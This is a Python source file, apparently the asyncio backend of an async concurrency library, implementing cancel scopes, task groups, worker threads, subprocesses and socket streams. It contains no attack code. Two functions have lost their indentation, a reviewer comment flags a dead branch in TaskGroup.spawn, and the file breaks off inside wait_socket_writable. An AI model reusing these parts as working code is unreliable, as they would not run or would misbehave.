# Python < 3.7 compatibility: use the native asyncio helpers when available,
# otherwise backport asyncio.run() and friends.
if sys.version_info >= (3, 7):
    from asyncio import all_tasks, create_task, current_task, get_running_loop
    from asyncio import run as native_run
    from contextlib import asynccontextmanager
else:
    from async_generator import asynccontextmanager

    _T = TypeVar('_T')

    def native_run(main, *, debug=False):
        """Backport of asyncio.run() for Python 3.6."""
        # Snatched from Python 3.7
        from asyncio import coroutines, events, tasks

        def _cancel_all_tasks(loop):
            # Cancel all outstanding tasks, wait for them, and report any
            # exceptions they terminated with.
            to_cancel = all_tasks(loop)
            if not to_cancel:
                return

            for task in to_cancel:
                task.cancel()

            loop.run_until_complete(
                tasks.gather(*to_cancel, loop=loop, return_exceptions=True))

            for task in to_cancel:
                if task.cancelled():
                    continue
                if task.exception() is not None:
                    loop.call_exception_handler({
                        'message': 'unhandled exception during asyncio.run() shutdown',
                        'exception': task.exception(),
                        'task': task,
                    })

        if events._get_running_loop() is not None:
            raise RuntimeError(
                "asyncio.run() cannot be called from a running event loop")
        if not coroutines.iscoroutine(main):
            raise ValueError("a coroutine was expected, got {!r}".format(main))

        loop = events.new_event_loop()
        try:
            events.set_event_loop(loop)
            loop.set_debug(debug)
            return loop.run_until_complete(main)
        finally:
            try:
                _cancel_all_tasks(loop)
                loop.run_until_complete(loop.shutdown_asyncgens())
            finally:
                events.set_event_loop(None)
                loop.close()

    def create_task(coro: Union[Generator[Any, None, _T], Awaitable[_T]], *,  # type: ignore
                    name: Optional[str] = None) -> asyncio.Task:
        # 'name' accepted for API parity with 3.8+, but ignored here.
        return get_running_loop().create_task(coro)

    def get_running_loop() -> asyncio.AbstractEventLoop:
        loop = asyncio._get_running_loop()
        if loop is not None:
            return loop
        else:
            raise RuntimeError('no running event loop')

    def all_tasks(loop: Optional[asyncio.AbstractEventLoop] = None) -> Set[asyncio.Task]:
        """Return a set of all tasks for the loop."""
        from asyncio import Task
        if loop is None:
            loop = get_running_loop()

        return {t for t in Task.all_tasks(loop) if not t.done()}

    def current_task(loop: Optional[asyncio.AbstractEventLoop] = None) -> Optional[asyncio.Task]:
        if loop is None:
            loop = get_running_loop()

        return asyncio.Task.current_task(loop)
# Generic return-type variable used by the thread/run helpers below.
T_Retval = TypeVar('T_Retval')

# Check whether there is native support for task names in asyncio (3.8+)
_native_task_names = hasattr(asyncio.Task, 'get_name')
def get_callable_name(func: Callable) -> str:
module = getattr(func, '__module__', None)
qualname = getattr(func, '__qualname__', None)
return '.'.join([x for x in (module, qualname) if x])
#
# Event loop
#
def _maybe_set_event_loop_policy(policy: Optional[asyncio.AbstractEventLoopPolicy],
use_uvloop: bool) -> None:
# On CPython, use uvloop when possible if no other policy has been given and if not
# explicitly disabled
if policy is None and use_uvloop and sys.implementation.name == 'cpython':
try:
import uvloop
except ImportError:
pass
else:
# Test for missing shutdown_default_executor() (uvloop 0.14.0 and earlier)
if (not hasattr(asyncio.AbstractEventLoop, 'shutdown_default_executor')
or hasattr(uvloop.loop.Loop, 'shutdown_default_executor')):
policy = uvloop.EventLoopPolicy()
if policy is not None:
asyncio.set_event_loop_policy(policy)
def run(func: Callable[..., T_Retval], *args, debug: bool = False, use_uvloop: bool = True,
        policy: Optional[asyncio.AbstractEventLoopPolicy] = None) -> T_Retval:
    """Run *func* with *args* in a fresh event loop and return its result."""

    @wraps(func)
    async def wrapper():
        # Register bookkeeping state for the root task so that cancel scopes
        # and task introspection can find it, and clean it up afterwards.
        root_task = current_task()
        state = TaskState(None, get_callable_name(func), None)
        _task_states[root_task] = state
        if _native_task_names:
            root_task.set_name(state.name)

        try:
            return await func(*args)
        finally:
            del _task_states[root_task]

    _maybe_set_event_loop_policy(policy, use_uvloop)
    return native_run(wrapper(), debug=debug)
#
# Miscellaneous
#
async def sleep(delay: float) -> None:
    """Suspend the current task for *delay* seconds.

    Runs a cancellation checkpoint first, so a cancelled scope raises even
    for a zero-length sleep.
    """
    await checkpoint()
    await asyncio.sleep(delay)


#
# Timeouts and cancellation
#
# Re-exported so callers catch the same exception asyncio raises natively.
CancelledError = asyncio.CancelledError
class CancelScope(abc.CancelScope):
    """asyncio implementation of a cancel scope.

    A scope tracks the tasks executing within it; cancel() delivers
    cancellation to those tasks and to nested scopes (honouring shields),
    and an optional deadline cancels the scope automatically.
    """
    __slots__ = ('_deadline', '_shield', '_parent_scope', '_cancel_called', '_active',
                 '_timeout_task', '_tasks', '_host_task', '_timeout_expired')

    def __init__(self, deadline: float = math.inf, shield: bool = False):
        self._deadline = deadline  # absolute loop time; math.inf = no timeout
        self._shield = shield  # blocks cancellation coming from outer scopes
        self._parent_scope: Optional[CancelScope] = None
        self._cancel_called = False
        self._active = False
        self._timeout_task: Optional[asyncio.Task] = None  # deadline watcher
        self._tasks: Set[asyncio.Task] = set()  # tasks hosted in this scope
        self._host_task: Optional[asyncio.Task] = None
        self._timeout_expired = False

    async def __aenter__(self):
        async def timeout():
            # Sleep until the deadline, then cancel the whole scope.
            await asyncio.sleep(self._deadline - get_running_loop().time())
            self._timeout_expired = True
            await self.cancel()

        if self._active:
            raise RuntimeError(
                "Each CancelScope may only be used for a single 'async with' block"
            )

        self._host_task = current_task()
        self._tasks.add(self._host_task)
        # Link this scope into the host task's scope chain.
        try:
            task_state = _task_states[self._host_task]
        except KeyError:
            task_name = self._host_task.get_name() if _native_task_names else None
            task_state = TaskState(None, task_name, self)
            _task_states[self._host_task] = task_state
        else:
            self._parent_scope = task_state.cancel_scope
            task_state.cancel_scope = self

        if self._deadline != math.inf:
            if get_running_loop().time() >= self._deadline:
                # Deadline already passed before the scope was entered.
                self._cancel_called = True
                self._timeout_expired = True
            else:
                self._timeout_task = get_running_loop().create_task(timeout())

        self._active = True
        return self

    async def __aexit__(self, exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> Optional[bool]:
        self._active = False
        if self._timeout_task:
            self._timeout_task.cancel()

        assert self._host_task is not None
        self._tasks.remove(self._host_task)
        # Unlink this scope from the host task's scope chain.
        host_task_state = _task_states.get(self._host_task)
        if host_task_state is not None and host_task_state.cancel_scope is self:
            host_task_state.cancel_scope = self._parent_scope

        if exc_val is not None:
            # Swallow CancelledError(s) that this scope itself caused.
            exceptions = exc_val.exceptions if isinstance(exc_val, ExceptionGroup) else [exc_val]
            if all(isinstance(exc, CancelledError) for exc in exceptions):
                if self._timeout_expired:
                    return True
                elif not self._parent_cancelled():
                    # This scope was directly cancelled
                    return True

        return None

    async def _cancel(self):
        # Deliver cancellation to directly contained tasks and nested cancel scopes
        for task in self._tasks:
            # Cancel the task directly, but only if it's blocked and isn't within a shielded scope
            cancel_scope = _task_states[task].cancel_scope
            if cancel_scope is self:
                # Only deliver the cancellation if the task is already running (but not this task!)
                try:
                    running = task._coro.cr_running
                    awaitable = task._coro.cr_await
                except AttributeError:
                    # Generator-based coroutine rather than a native one.
                    running = task._coro.gi_running
                    awaitable = task._coro.gi_yieldfrom

                if not running and awaitable is not None:
                    task.cancel()
            elif not cancel_scope._shielded_to(self):
                await cancel_scope._cancel()

    def _shielded_to(self, parent: Optional['CancelScope']) -> bool:
        # Check whether this task or any parent up to (but not including) the "parent" argument is
        # shielded
        cancel_scope: Optional[CancelScope] = self
        while cancel_scope is not None and cancel_scope is not parent:
            if cancel_scope._shield:
                return True
            else:
                cancel_scope = cancel_scope._parent_scope

        return False

    def _parent_cancelled(self) -> bool:
        # Check whether any parent has been cancelled
        cancel_scope = self._parent_scope
        while cancel_scope is not None and not cancel_scope._shield:
            if cancel_scope._cancel_called:
                return True
            else:
                cancel_scope = cancel_scope._parent_scope

        return False

    async def cancel(self) -> None:
        """Cancel this scope; idempotent."""
        if self._cancel_called:
            return

        self._cancel_called = True
        await self._cancel()

    @property
    def deadline(self) -> float:
        return self._deadline

    @property
    def cancel_called(self) -> bool:
        return self._cancel_called

    @property
    def shield(self) -> bool:
        return self._shield
async def checkpoint():
    """Yield control to the event loop, raising CancelledError first if any
    effective (unshielded) enclosing cancel scope has been cancelled."""
    task_state = _task_states.get(current_task())
    scope = task_state.cancel_scope if task_state is not None else None
    while scope is not None:
        if scope.cancel_called:
            raise CancelledError
        if scope.shield:
            # Shielded: outer scopes cannot affect us, stop looking.
            break
        scope = scope._parent_scope

    await asyncio.sleep(0)
@asynccontextmanager
async def fail_after(delay: float, shield: bool):
    """Async context manager: cancel the enclosed block after *delay*
    seconds and raise TimeoutError if the deadline was what cancelled it."""
    deadline = get_running_loop().time() + delay
    async with CancelScope(deadline, shield) as scope:
        yield scope

    if scope._timeout_expired:
        raise TimeoutError
@asynccontextmanager
async def move_on_after(delay: float, shield: bool):
    """Async context manager: silently cancel the enclosed block after
    *delay* seconds (no TimeoutError is raised)."""
    deadline = get_running_loop().time() + delay
    async with CancelScope(deadline=deadline, shield=shield) as scope:
        yield scope
async def current_effective_deadline():
    """Return the soonest deadline among the enclosing cancel scopes,
    stopping at the first shielded scope (outer deadlines cannot reach us)."""
    nearest = math.inf
    scope = _task_states[current_task()].cancel_scope
    while scope is not None:
        if scope.deadline < nearest:
            nearest = scope.deadline
        if scope.shield:
            break
        scope = scope._parent_scope

    return nearest
async def current_time():
    """Return the current time of the running event loop's clock."""
    return get_running_loop().time()
#
# Task states
#
class TaskState:
    """
    Encapsulates auxiliary task information that cannot be added to the Task instance itself
    because there are no guarantees about its implementation.
    """
    __slots__ = 'parent_id', 'name', 'cancel_scope'

    def __init__(self, parent_id: Optional[int], name: Optional[str],
                 cancel_scope: Optional[CancelScope]):
        self.parent_id = parent_id  # id() of the spawning task, if any
        self.name = name  # display name for introspection
        self.cancel_scope = cancel_scope  # innermost scope hosting the task


# Maps each task to its auxiliary state; weak keys so entries disappear
# automatically once a task is garbage collected.
_task_states = WeakKeyDictionary()  # type: WeakKeyDictionary[asyncio.Task, TaskState]
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup):
    """Raised when multiple child-task exceptions must be reported at once."""

    def __init__(self, exceptions: Sequence[BaseException]):
        super().__init__()
        self.exceptions = exceptions  # the collected child exceptions
class TaskGroup(abc.TaskGroup):
    """asyncio task group: spawned tasks share one cancel scope, and their
    exceptions are collected and re-raised when the group exits."""
    __slots__ = 'cancel_scope', '_active', '_exceptions'

    def __init__(self):
        self.cancel_scope: CancelScope = CancelScope()
        self._active = False
        self._exceptions: List[BaseException] = []

    async def __aenter__(self):
        await self.cancel_scope.__aenter__()
        self._active = True
        return self

    async def __aexit__(self, exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> Optional[bool]:
        ignore_exception = await self.cancel_scope.__aexit__(exc_type, exc_val, exc_tb)
        if exc_val is not None:
            # Host block raised: cancel the children and record the exception
            # unless the scope already swallowed it (its own cancellation).
            await self.cancel_scope.cancel()
            if not ignore_exception:
                self._exceptions.append(exc_val)

        # Wait for all spawned tasks to finish, re-delivering our own
        # cancellation to them if it arrives while waiting.
        while self.cancel_scope._tasks:
            try:
                await asyncio.wait(self.cancel_scope._tasks)
            except asyncio.CancelledError:
                await self.cancel_scope.cancel()

        self._active = False
        # Cancellation errors are only noise when the group itself was not
        # cancelled from outside.
        if not self.cancel_scope._parent_cancelled():
            exceptions = self._filter_cancellation_errors(self._exceptions)
        else:
            exceptions = self._exceptions

        try:
            if len(exceptions) > 1:
                raise ExceptionGroup(exceptions)
            elif exceptions and exceptions[0] is not exc_val:
                raise exceptions[0]
        except BaseException as exc:
            # Clear the context here, as it can only be done in-flight.
            # If the context is not cleared, it can result in recursive tracebacks (see #145).
            exc.__context__ = None
            raise

        return ignore_exception

    @staticmethod
    def _filter_cancellation_errors(exceptions: Sequence[BaseException]) -> List[BaseException]:
        """Drop CancelledErrors, recursing into nested ExceptionGroups."""
        filtered_exceptions: List[BaseException] = []
        for exc in exceptions:
            if isinstance(exc, ExceptionGroup):
                exc.exceptions = TaskGroup._filter_cancellation_errors(exc.exceptions)
                if exc.exceptions:
                    # Collapse a single-exception group to the bare exception.
                    if len(exc.exceptions) > 1:
                        filtered_exceptions.append(exc)
                    else:
                        filtered_exceptions.append(exc.exceptions[0])
            elif not isinstance(exc, CancelledError):
                filtered_exceptions.append(exc)

        return filtered_exceptions

    async def _run_wrapped_task(self, func: Callable[..., Coroutine], args: tuple) -> None:
        # Run a spawned coroutine, funnelling any exception into the group
        # and cancelling the siblings.
        task = cast(asyncio.Task, current_task())
        try:
            await func(*args)
        except BaseException as exc:
            self._exceptions.append(exc)
            await self.cancel_scope.cancel()
        finally:
            self.cancel_scope._tasks.remove(task)
            del _task_states[task]  # type: ignore

    async def spawn(self, func: Callable[..., Coroutine], *args, name=None) -> None:
        """Start *func* as a child task of this group."""
        if not self._active:
            raise RuntimeError('This task group is not active; no new tasks can be spawned.')

        name = name or get_callable_name(func)
        # NOTE(review): _native_task_names is a bool (hasattr result) and is
        # never None, so this branch is dead and the name is never passed to
        # create_task; presumably "if _native_task_names:" was intended.
        if _native_task_names is None:
            task = create_task(self._run_wrapped_task(func, args), name=name)  # type: ignore
        else:
            task = create_task(self._run_wrapped_task(func, args))

        # Make the spawned task inherit the task group's cancel scope
        _task_states[task] = TaskState(parent_id=id(current_task()), name=name,
                                       cancel_scope=self.cancel_scope)
        self.cancel_scope._tasks.add(task)
#
# Threads
#
# (result, exception) pair passed back from the worker thread; exactly one
# element is non-None.
_Retval_Queue_Type = Tuple[Optional[T_Retval], Optional[BaseException]]


async def run_sync_in_worker_thread(
        func: Callable[..., T_Retval], *args, cancellable: bool = False,
        limiter: Optional['CapacityLimiter'] = None) -> T_Retval:
    """Run *func* in a worker thread and await its result.

    cancellable -- when False (default) the wait is shielded, so the caller
    cannot be cancelled out from under a running thread.
    limiter -- capacity limiter bounding concurrent worker threads; the
    module default is used when omitted.
    """
    def thread_worker():
        # Runs in the worker thread: execute func, then hand the outcome
        # back to the event loop via thread-safe calls.
        try:
            with claim_worker_thread('asyncio'):
                threadlocals.loop = loop
                result = func(*args)
        except BaseException as exc:
            if not loop.is_closed():
                asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
                if not cancelled:
                    loop.call_soon_threadsafe(queue.put_nowait, (None, exc))
        else:
            if not loop.is_closed():
                asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
                if not cancelled:
                    loop.call_soon_threadsafe(queue.put_nowait, (result, None))

    await checkpoint()
    loop = get_running_loop()
    task = current_task()
    # Single-slot queue: the worker delivers exactly one outcome.
    queue: asyncio.Queue[_Retval_Queue_Type] = asyncio.Queue(1)
    cancelled = False
    limiter = limiter or _default_thread_limiter
    await limiter.acquire_on_behalf_of(task)
    thread = Thread(target=thread_worker, daemon=True)
    thread.start()
    # Shield the wait unless the caller explicitly allowed cancellation.
    async with CancelScope(shield=not cancellable):
        try:
            retval, exception = await queue.get()
        finally:
            # Tell the worker not to post a result we will never consume.
            cancelled = True

    if exception is not None:
        raise exception
    else:
        return cast(T_Retval, retval)
def run_async_from_thread(func: Callable[..., Coroutine[Any, Any, T_Retval]], *args) -> T_Retval:
    """Schedule ``func(*args)`` on this worker thread's event loop and block
    until the coroutine's result is available."""
    coro = func(*args)
    future: concurrent.futures.Future[T_Retval] = asyncio.run_coroutine_threadsafe(
        coro, threadlocals.loop)
    return future.result()
class BlockingPortal(abc.BlockingPortal):
    """Portal for calling into this event loop from foreign threads."""

    # Remember the loop the portal was created on so calls arriving from
    # other threads can be routed back to it.
    __slots__ = '_loop'

    def __init__(self):
        super().__init__()
        self._loop = get_running_loop()

    def _spawn_task_from_thread(self, func: Callable, args: tuple, future: Future) -> None:
        # Thread-safe hand-off: schedule the spawn on the portal's own loop.
        asyncio.run_coroutine_threadsafe(
            self._task_group.spawn(self._call_func, func, args, future), self._loop)
#
# Subprocesses
#
@dataclass
class StreamReaderWrapper(abc.ByteReceiveStream):
    """Adapt an :class:`asyncio.StreamReader` to the byte receive stream API."""

    _stream: asyncio.StreamReader

    async def receive(self, max_bytes: int = 65536) -> bytes:
        chunk = await self._stream.read(max_bytes)
        # An empty read means the peer closed the stream.
        if not chunk:
            raise EndOfStream

        return chunk

    async def aclose(self) -> None:
        self._stream.feed_eof()
@dataclass
class StreamWriterWrapper(abc.ByteSendStream):
    """Adapt an :class:`asyncio.StreamWriter` to the byte send stream API."""

    _stream: asyncio.StreamWriter

    async def send(self, item: bytes) -> None:
        # Write, then honor the writer's flow control before returning.
        self._stream.write(item)
        await self._stream.drain()

    async def aclose(self) -> None:
        self._stream.close()
@dataclass
class Process(abc.Process):
    """Wrap :class:`asyncio.subprocess.Process` behind anyio's stream types."""

    _process: asyncio.subprocess.Process
    _stdin: Optional[abc.ByteSendStream]
    _stdout: Optional[abc.ByteReceiveStream]
    _stderr: Optional[abc.ByteReceiveStream]

    async def aclose(self) -> None:
        # Close any open pipes first, then wait for the process to exit.
        if self._stdin:
            await self._stdin.aclose()
        if self._stdout:
            await self._stdout.aclose()
        if self._stderr:
            await self._stderr.aclose()

        await self.wait()

    async def wait(self) -> int:
        """Wait for the child to exit and return its exit code."""
        return await self._process.wait()

    def terminate(self) -> None:
        self._process.terminate()

    def kill(self) -> None:
        self._process.kill()

    def send_signal(self, signal: int) -> None:
        self._process.send_signal(signal)

    @property
    def pid(self) -> int:
        return self._process.pid

    @property
    def returncode(self) -> Optional[int]:
        # None while the process is still running.
        return self._process.returncode

    @property
    def stdin(self) -> Optional[abc.ByteSendStream]:
        return self._stdin

    @property
    def stdout(self) -> Optional[abc.ByteReceiveStream]:
        return self._stdout

    @property
    def stderr(self) -> Optional[abc.ByteReceiveStream]:
        return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int):
    """Start a subprocess and wrap it in a :class:`Process`.

    :param command: a command string (``shell=True``) or an argv sequence
    :param shell: whether to run the command through the shell
    :param stdin/stdout/stderr: subprocess pipe constants for each stream
    """
    await checkpoint()
    if shell:
        process = await asyncio.create_subprocess_shell(command, stdin=stdin, stdout=stdout,
                                                        stderr=stderr)
    else:
        process = await asyncio.create_subprocess_exec(*command, stdin=stdin, stdout=stdout,
                                                       stderr=stderr)

    # Pipes that were not requested come back as None and stay None here.
    stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None
    stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None
    stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None
    return Process(process, stdin_stream, stdout_stream, stderr_stream)
#
# Sockets and networking
#

# Per-socket wakeup events used by wait_socket_readable()/wait_socket_writable();
# the presence of an entry also serves as a "someone is already waiting" flag.
_read_events: Dict[socket.SocketType, asyncio.Event] = {}
_write_events: Dict[socket.SocketType, asyncio.Event] = {}
class StreamProtocol(asyncio.Protocol):
    """asyncio protocol backing :class:`SocketStream`.

    Buffers received chunks in ``read_queue`` and signals readers/writers
    through the two events.
    """

    read_queue: Deque[bytes]
    read_event: asyncio.Event    # set when data arrives, EOF, or loss
    write_event: asyncio.Event   # set while writing is allowed
    exception: Optional[Exception] = None  # connection-loss cause, if any

    def connection_made(self, transport: asyncio.BaseTransport) -> None:
        self.read_queue = deque()
        self.read_event = asyncio.Event()
        self.write_event = asyncio.Event()
        self.write_event.set()
        # Zero buffer limit so pause_writing()/resume_writing() fire per write,
        # letting send() wait until data is actually flushed.
        cast(asyncio.Transport, transport).set_write_buffer_limits(0)

    def connection_lost(self, exc: Optional[Exception]) -> None:
        self.exception = exc
        # Wake up any task blocked on reading or writing.
        self.read_event.set()
        self.write_event.set()

    def data_received(self, data: bytes) -> None:
        self.read_queue.append(data)
        self.read_event.set()

    def eof_received(self) -> Optional[bool]:
        self.read_event.set()
        # Returning None lets asyncio close the transport on EOF.
        return None

    def pause_writing(self) -> None:
        self.write_event.clear()

    def resume_writing(self) -> None:
        self.write_event.set()
class DatagramProtocol(asyncio.DatagramProtocol):
    """asyncio protocol backing the UDP socket classes."""

    read_queue: Deque[Tuple[bytes, IPSockAddrType]]
    read_event: asyncio.Event
    write_event: asyncio.Event
    exception: Optional[Exception] = None  # set by error_received() only

    def connection_made(self, transport: asyncio.BaseTransport) -> None:
        self.read_queue = deque(maxlen=100)  # arbitrary value
        self.read_event = asyncio.Event()
        self.write_event = asyncio.Event()
        self.write_event.set()

    def connection_lost(self, exc: Optional[Exception]) -> None:
        # NOTE(review): unlike StreamProtocol, ``exc`` is not recorded here --
        # confirm whether that is intentional for datagram transports.
        self.read_event.set()
        self.write_event.set()

    def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None:
        # Normalize 4-tuple IPv6 addresses to the common (host, port) form.
        addr = convert_ipv6_sockaddr(addr)
        self.read_queue.append((data, addr))
        self.read_event.set()

    def error_received(self, exc: Exception) -> None:
        self.exception = exc

    def pause_writing(self) -> None:
        self.write_event.clear()

    def resume_writing(self) -> None:
        self.write_event.set()
class SocketStream(abc.SocketStream):
    """Connected stream socket built on an asyncio transport/protocol pair."""

    def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol):
        self._transport = transport
        self._protocol = protocol
        # Guards reject concurrent receive()/send() calls from separate tasks.
        self._receive_guard = ResourceGuard('reading from')
        self._send_guard = ResourceGuard('writing to')
        self._closed = False

    @property
    def _raw_socket(self) -> socket.socket:
        return self._transport.get_extra_info('socket')

    async def receive(self, max_bytes: int = 65536) -> bytes:
        with self._receive_guard:
            await checkpoint()
            # Resume the (normally paused) transport only while we actually
            # need more data, keeping the read queue bounded.
            if not self._protocol.read_queue and not self._transport.is_closing():
                self._protocol.read_event.clear()
                self._transport.resume_reading()
                await self._protocol.read_event.wait()
                self._transport.pause_reading()

            try:
                chunk = self._protocol.read_queue.popleft()
            except IndexError:
                # Woke up with an empty queue: closed locally, broken, or EOF.
                if self._closed:
                    raise ClosedResourceError from None
                elif self._protocol.exception:
                    raise BrokenResourceError from self._protocol.exception
                else:
                    raise EndOfStream

            if len(chunk) > max_bytes:
                # Split the oversized chunk
                chunk, leftover = chunk[:max_bytes], chunk[max_bytes:]
                self._protocol.read_queue.appendleft(leftover)

            return chunk

    async def send(self, item: bytes) -> None:
        with self._send_guard:
            await checkpoint()
            try:
                self._transport.write(item)
            except RuntimeError as exc:
                if self._closed:
                    raise ClosedResourceError from None
                elif self._transport.is_closing():
                    raise BrokenResourceError from exc
                else:
                    raise

            # With a zero write buffer limit this waits until the data has
            # actually been flushed to the transport.
            await self._protocol.write_event.wait()

    async def send_eof(self) -> None:
        try:
            self._transport.write_eof()
        except OSError:
            pass

    async def aclose(self) -> None:
        if not self._transport.is_closing():
            self._closed = True
            try:
                self._transport.write_eof()
            except OSError:
                pass

            self._transport.close()
            # Yield once so the transport can close gracefully, then abort
            # whatever is left.
            await asyncio.sleep(0)
            self._transport.abort()
class SocketListener(abc.SocketListener):
    """Listening socket that accepts connections as :class:`SocketStream`."""

    def __init__(self, raw_socket: socket.SocketType):
        self.__raw_socket = raw_socket
        self._loop = cast(asyncio.BaseEventLoop, get_running_loop())
        self._accept_guard = ResourceGuard('accepting connections from')

    @property
    def _raw_socket(self) -> socket.socket:
        return self.__raw_socket

    async def accept(self) -> abc.SocketStream:
        with self._accept_guard:
            await checkpoint()
            try:
                client_sock, _addr = await self._loop.sock_accept(self._raw_socket)
            except asyncio.CancelledError:
                # Workaround for https://bugs.python.org/issue41317
                try:
                    self._loop.remove_reader(self._raw_socket)
                except NotImplementedError:
                    pass

                raise

        # Disable Nagle's algorithm on TCP connections for lower latency.
        if client_sock.family in (socket.AF_INET, socket.AF_INET6):
            client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

        transport, protocol = await self._loop.connect_accepted_socket(StreamProtocol, client_sock)
        return SocketStream(cast(asyncio.Transport, transport), cast(StreamProtocol, protocol))

    async def aclose(self) -> None:
        self._raw_socket.close()
class UDPSocket(abc.UDPSocket):
    """Unconnected UDP socket: sends to and receives from explicit addresses."""

    def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
        self._transport = transport
        self._protocol = protocol
        self._receive_guard = ResourceGuard('reading from')
        self._send_guard = ResourceGuard('writing to')
        self._closed = False

    @property
    def _raw_socket(self) -> SocketType:
        return self._transport.get_extra_info('socket')

    async def aclose(self) -> None:
        if not self._transport.is_closing():
            self._closed = True
            self._transport.close()

    async def receive(self) -> Tuple[bytes, IPSockAddrType]:
        """Return the next ``(payload, sender_address)`` pair."""
        with self._receive_guard:
            await checkpoint()

            # If the buffer is empty, ask for more data
            if not self._protocol.read_queue and not self._transport.is_closing():
                self._protocol.read_event.clear()
                await self._protocol.read_event.wait()

            try:
                return self._protocol.read_queue.popleft()
            except IndexError:
                if self._closed:
                    raise ClosedResourceError from None
                else:
                    raise BrokenResourceError from None

    async def send(self, item: UDPPacketType) -> None:
        """Send ``(payload, destination_address)``."""
        with self._send_guard:
            await checkpoint()
            await self._protocol.write_event.wait()
            if self._closed:
                raise ClosedResourceError
            elif self._transport.is_closing():
                raise BrokenResourceError
            else:
                self._transport.sendto(*item)
class ConnectedUDPSocket(abc.ConnectedUDPSocket):
    """UDP socket bound to one peer: payloads only, no explicit addresses."""

    def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
        self._transport = transport
        self._protocol = protocol
        self._receive_guard = ResourceGuard('reading from')
        self._send_guard = ResourceGuard('writing to')
        self._closed = False

    @property
    def _raw_socket(self) -> SocketType:
        return self._transport.get_extra_info('socket')

    async def aclose(self) -> None:
        if not self._transport.is_closing():
            self._closed = True
            self._transport.close()

    async def receive(self) -> bytes:
        with self._receive_guard:
            await checkpoint()

            # If the buffer is empty, ask for more data
            if not self._protocol.read_queue and not self._transport.is_closing():
                self._protocol.read_event.clear()
                await self._protocol.read_event.wait()

            try:
                packet = self._protocol.read_queue.popleft()
            except IndexError:
                if self._closed:
                    raise ClosedResourceError from None
                else:
                    raise BrokenResourceError from None

            # Drop the sender address; the socket is connected to one peer.
            return packet[0]

    async def send(self, item: bytes) -> None:
        with self._send_guard:
            await checkpoint()
            await self._protocol.write_event.wait()
            if self._closed:
                raise ClosedResourceError
            elif self._transport.is_closing():
                raise BrokenResourceError
            else:
                self._transport.sendto(item)
async def connect_tcp(host: str, port: int,
                      local_addr: Optional[Tuple[str, int]] = None) -> SocketStream:
    """Open a TCP connection and wrap it in a :class:`SocketStream`."""
    loop = get_running_loop()
    transport, protocol = await loop.create_connection(
        StreamProtocol, host, port, local_addr=local_addr)
    transport = cast(asyncio.Transport, transport)
    # Start paused; SocketStream.receive() resumes reading on demand.
    transport.pause_reading()
    return SocketStream(transport, cast(StreamProtocol, protocol))
async def connect_unix(path: str) -> SocketStream:
    """Connect to a UNIX domain socket and wrap it in a :class:`SocketStream`."""
    loop = get_running_loop()
    transport, protocol = await loop.create_unix_connection(StreamProtocol, path)
    transport = cast(asyncio.Transport, transport)
    # Start paused; SocketStream.receive() resumes reading on demand.
    transport.pause_reading()
    return SocketStream(transport, cast(StreamProtocol, protocol))
async def create_udp_socket(
    family: socket.AddressFamily,
    local_address: Optional[IPSockAddrType],
    remote_address: Optional[IPSockAddrType],
    reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
    """Create a UDP endpoint.

    Returns a :class:`ConnectedUDPSocket` when *remote_address* is given,
    otherwise an unconnected :class:`UDPSocket`.
    """
    result = await get_running_loop().create_datagram_endpoint(
        DatagramProtocol, local_addr=local_address, remote_addr=remote_address, family=family,
        reuse_port=reuse_port)
    transport = cast(asyncio.DatagramTransport, result[0])
    protocol = cast(DatagramProtocol, result[1])
    if protocol.exception:
        # Endpoint creation surfaced an error; clean up before raising.
        transport.close()
        raise protocol.exception

    if not remote_address:
        return UDPSocket(transport, protocol)
    else:
        return ConnectedUDPSocket(transport, protocol)
async def getaddrinfo(host: Union[bytearray, bytes, str], port: Union[str, int, None], *,
                      family: Union[int, AddressFamily] = 0, type: Union[int, SocketKind] = 0,
                      proto: int = 0, flags: int = 0) -> GetAddrInfoReturnType:
    """Async wrapper around the event loop's getaddrinfo()."""
    # https://github.com/python/typeshed/pull/4304
    result = await get_running_loop().getaddrinfo(
        host, port, family=family, type=type, proto=proto, flags=flags)  # type: ignore[arg-type]
    return cast(GetAddrInfoReturnType, result)
async def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Tuple[str, str]:
    """Async wrapper around the event loop's getnameinfo()."""
    # https://github.com/python/typeshed/pull/4305
    result = await get_running_loop().getnameinfo(sockaddr, flags)
    return cast(Tuple[str, str], result)
async def wait_socket_readable(sock: socket.SocketType) -> None:
    """Suspend until *sock* has data available to read.

    :raises BusyResourceError: if another task is already waiting on *sock*
    :raises ClosedResourceError: if the wait was aborted (event entry removed
        by whoever closed the socket)
    """
    await checkpoint()
    if _read_events.get(sock):
        raise BusyResourceError('reading from') from None

    loop = get_running_loop()
    event = _read_events[sock] = asyncio.Event()
    # Consistency fix: use the loop captured above instead of re-fetching the
    # running loop, matching the remove_reader() call in the finally block.
    loop.add_reader(sock, event.set)
    try:
        await event.wait()
    finally:
        # If our entry is still present we own the reader registration;
        # its absence means the socket was closed out from under us.
        if _read_events.pop(sock, None) is not None:
            loop.remove_reader(sock)
            readable = True
        else:
            readable = False

    if not readable:
        raise ClosedResourceError
async def wait_socket_writable(sock: socket.SocketType) -> None:
    """Suspend until *sock* can accept writes.

    :raises BusyResourceError: if another task is already waiting on *sock*
    :raises ClosedResourceError: if the wait was aborted (event entry removed
        by whoever closed the socket)
    """
    await checkpoint()
    if _write_events.get(sock):
        raise BusyResourceError('writing to') from None

    loop = get_running_loop()
    event = _write_events[sock] = asyncio.Event()
    # NOTE(review): registers with ``sock.fileno()`` but unregisters with
    # ``sock`` below; both resolve to the same descriptor on selector loops,
    # but confirm this asymmetry is intentional.
